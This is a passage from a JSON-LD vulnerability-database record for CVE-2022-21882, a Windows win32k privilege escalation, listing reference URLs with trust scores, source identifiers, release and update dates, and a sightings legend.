"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.2,
"url": "http://packetstormsecurity.com/files/166169/win32k-consolecontrol-offset-confusion-privilege-escalation.html"
},
{
"trust": 1.6,
"url": "https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2022-21882"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21882"
},
{
"trust": 0.8,
"url": "https://www.ipa.go.jp/security/ciadr/vul/20220112-ms.html"
},
{
"trust": 0.8,
"url": "https://www.jpcert.or.jp/at/2022/at220002.html"
},
{
"trust": 0.6,
"url": "https://msrc.microsoft.com/update-guide/vulnerability/cve-2022-21882"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/windows-vulnerabilities-de-decembre-2021-37219"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-1732"
},
{
"trust": 0.1,
"url": "https://attackerkb.com/assessments/1a332300-7ded-419b-b717-9bf03ca2a14e\u0027"
},
{
"trust": 0.1,
"url": "https://msrc.microsoft.com/update-guide/vulnerability/cve-2021-1732\u0027"
},
{
"trust": 0.1,
"url": "https://www.fuzzysecurity.com/tutorials/expdev/22.html\u0027"
},
{
"trust": 0.1,
"url": "https://github.com/rapid7/metasploit-framework"
},
{
"trust": 0.1,
"url": "https://github.com/l4ys/cve-2022-21882\u0027"
},
{
"trust": 0.1,
"url": "https://github.com/kalendsi/cve-2022-21882\u0027"
},
{
"trust": 0.1,
"url": "https://metasploit.com/download"
},
{
"trust": 0.1,
"url": "https://github.com/kalendsi/cve-2021-1732-exploit\u0027"
},
{
"trust": 0.1,
"url": "https://byteraptors.github.io/windows/exploitation/2020/06/03/exploitingcve2019-1458.html\u0027"
},
{
"trust": 0.1,
"url": "https://www.geoffchappell.com/studies/windows/win32/user32/structs/wnd/index.htm\u0027"
},
{
"trust": 0.1,
"url": "https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/\u0027"
},
{
"trust": 0.1,
"url": "https://www.trendmicro.com/en_us/research/16/l/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild.html\u0027"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-001057"
},
{
"db": "PACKETSTORM",
"id": "166169"
},
{
"db": "CNNVD",
"id": "CNNVD-202201-802"
},
{
"db": "NVD",
"id": "CVE-2022-21882"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2022-21882"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-001057"
},
{
"db": "PACKETSTORM",
"id": "166169"
},
{
"db": "CNNVD",
"id": "CNNVD-202201-802"
},
{
"db": "NVD",
"id": "CVE-2022-21882"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-01-11T00:00:00",
"db": "VULMON",
"id": "CVE-2022-21882"
},
{
"date": "2022-01-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2022-001057"
},
{
"date": "2022-02-28T16:49:05",
"db": "PACKETSTORM",
"id": "166169"
},
{
"date": "2022-01-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202201-802"
},
{
"date": "2022-01-11T21:15:11.507000",
"db": "NVD",
"id": "CVE-2022-21882"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-12-21T00:00:00",
"db": "VULMON",
"id": "CVE-2022-21882"
},
{
"date": "2022-01-21T06:03:00",
"db": "JVNDB",
"id": "JVNDB-2022-001057"
},
{
"date": "2022-03-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202201-802"
},
{
"date": "2024-07-24T16:48:20.753000",
"db": "NVD",
"id": "CVE-2022-21882"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202201-802"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural \u00a0Microsoft\u00a0Windows\u00a0 Elevated authority vulnerabilities in products",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-001057"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202201-802"
}
],
"trust": 0.6
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.
Loading…
Loading…